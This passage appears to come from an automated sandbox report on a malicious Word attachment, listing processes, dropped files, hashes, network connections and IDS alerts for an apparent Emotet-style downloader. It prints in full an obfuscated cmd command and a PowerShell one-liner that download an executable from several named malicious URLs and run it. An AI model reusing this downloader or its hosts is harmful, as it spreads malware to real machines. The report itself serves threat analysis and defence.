79)do set eR7=!eR7!!Qbq:~%P,1!&&if %P equ 79 echo !eR7:*eR7!=!|cmd"
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2552
CMD:
C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $p2173='c8071';$q198=new-object Net.WebClient;$a7203='http://duanmizukipark.com/3jd4h1qiw@http://nationalidea.info/JY3qgvTT@http://biznes.rise-up.nsk.ru/PbkT7JBm@http://34.239.95.80/Y36Xs5Psm@http://mail.hotgirlsgames.xyz/UotiOme'.Split('@');$z8451='t9549';$h3629 = '101';$j9350='z4571';$q6653=$env:temp+'\'+$h3629+'.exe';foreach($o7410 in $a7203){try{$q198.DownloadFile($o7410, $q6653);$m5042='q6192';If ((Get-Item $q6653).length -ge 40000) {Invoke-Item $q6653;$w6467='b2776';break;}}catch{}}$b4506='m9120';"
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2596
CMD:
cmd
Path:
C:\Windows\system32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
3068
CMD:
powershell $p2173='c8071';$q198=new-object Net.WebClient;$a7203='http://duanmizukipark.com/3jd4h1qiw@http://nationalidea.info/JY3qgvTT@http://biznes.rise-up.nsk.ru/PbkT7JBm@http://34.239.95.80/Y36Xs5Psm@http://mail.hotgirlsgames.xyz/UotiOme'.Split('@');$z8451='t9549';$h3629 = '101';$j9350='z4571';$q6653=$env:temp+'\'+$h3629+'.exe';foreach($o7410 in $a7203){try{$q198.DownloadFile($o7410, $q6653);$m5042='q6192';If ((Get-Item $q6653).length -ge 40000) {Invoke-Item $q6653;$w6467='b2776';break;}}catch{}}$b4506='m9120';
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
PID:
2324
CMD:
"C:\Users\admin\AppData\Local\Temp\101.exe"
Path:
C:\Users\admin\AppData\Local\Temp\101.exe
Parent process:
powershell.exe
User:
admin
Company:
Creative Technology Ltd
Integrity Level:
MEDIUM
Description:
Thk3216
Exit code:
0
Version:
0.80.00.0260-0.80.2600
PID:
3240
CMD:
"C:\Users\admin\AppData\Local\Temp\101.exe"
Path:
C:\Users\admin\AppData\Local\Temp\101.exe
Parent process:
101.exe
User:
admin
Company:
Creative Technology Ltd
Integrity Level:
MEDIUM
Description:
Thk3216
Exit code:
0
Version:
0.80.00.0260-0.80.2600
PID:
3096
CMD:
"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
Path:
C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Parent process:
101.exe
User:
admin
Company:
Creative Technology Ltd
Integrity Level:
MEDIUM
Description:
Thk3216
Exit code:
0
Version:
0.80.00.0260-0.80.2600
PID:
3668
CMD:
"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
Path:
C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Parent process:
wabmetagen.exe
User:
admin
Company:
Creative Technology Ltd
Integrity Level:
MEDIUM
Description:
Thk3216
Version:
0.80.00.0260-0.80.2600
Total events
1 790
Read events
1 309
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
PID: 2956
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRE979.tmp.cvr
MD5:
SHA256:

PID: 2956
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C6CA305.jpg
MD5:
SHA256:

PID: 3068
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0W78QS8T4M2Y2MQCQUVC.temp
MD5:
SHA256:

PID: 3068
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f7b2.TMP
Type: binary
MD5: 2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256: AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3

PID: 3068
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256: AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3

PID: 3068
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\101.exe
Type: executable
MD5: 90F9A476BCD657B686CD686FE6A5BC82
SHA256: 30D9A29A2490395DF536803D98AFCCBCA2E22B70755759DF08DE7943231AFFCE

PID: 2956
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: D37602392B58725B3F092A1181F3B2FF
SHA256: AB5B3951CB0F508E9E6FC03654CA214D3C33DB5A519C7233CB1AFAD880D7656F

PID: 2956
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$titled-attachment-01222019.doc
Type: pgc
MD5: 6A8501951230ABADAA1BE66D5C1FA98F
SHA256: 878E84130B0643A63F91D8CED1BE5E232AED1DF07B0A662DEE95E122954C30AA

PID: 3240
Process: 101.exe
Filename: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Type: executable
MD5: 90F9A476BCD657B686CD686FE6A5BC82
SHA256: 30D9A29A2490395DF536803D98AFCCBCA2E22B70755759DF08DE7943231AFFCE

PID: 2956
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: tlb
MD5: ED3399AF66BC415B3CE1A4B906924F56
SHA256: 7380A70E48A17C3C57E74DF3008E9B4BC9E39BD30FA3D7CD648DE4D2935D5B8A
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
PID: 3668
Process: wabmetagen.exe
Method: GET
HTTP Code:
IP: 200.125.113.60:8080
URL: http://200.125.113.60:8080/
CN: AR
Type:
Size:
Reputation: malicious

PID: 3068
Process: powershell.exe
Method: GET
HTTP Code: 200
IP: 45.252.248.20:80
URL: http://duanmizukipark.com/3jd4h1qiw/
CN: VN
Type: executable
Size: 573 Kb
Reputation: malicious

PID: 3068
Process: powershell.exe
Method: GET
HTTP Code: 301
IP: 45.252.248.20:80
URL: http://duanmizukipark.com/3jd4h1qiw
CN: VN
Type: html
Size: 617 b
Reputation: malicious

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
PID: 3668
Process: wabmetagen.exe
IP: 200.125.113.60:8080
Domain:
ASN: Telecentro S.A.
CN: AR
Reputation: malicious

PID: 3068
Process: powershell.exe
IP: 45.252.248.20:80
Domain: duanmizukipark.com
ASN: AZDIGI Corporation
CN: VN
Reputation: malicious

DNS requests

Domain
IP
Reputation
Domain: duanmizukipark.com
IP:
  • 45.252.248.20
Reputation: malicious

Threats

PID
Process
Class
Message
PID: 3068
Process: powershell.exe
Class: A Network Trojan was detected
Message: SC TROJAN_DOWNLOADER Suspicious loader with tiny header

PID: 3068
Process: powershell.exe
Class: A Network Trojan was detected
Message: SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32

PID: 3068
Process: powershell.exe
Class: Potential Corporate Privacy Violation
Message: ET POLICY PE EXE or DLL Windows file download HTTP

PID: 3068
Process: powershell.exe
Class: Potentially Bad Traffic
Message: ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download

PID: 3068
Process: powershell.exe
Class: Misc activity
Message: ET INFO EXE - Served Attached HTTP
No debug info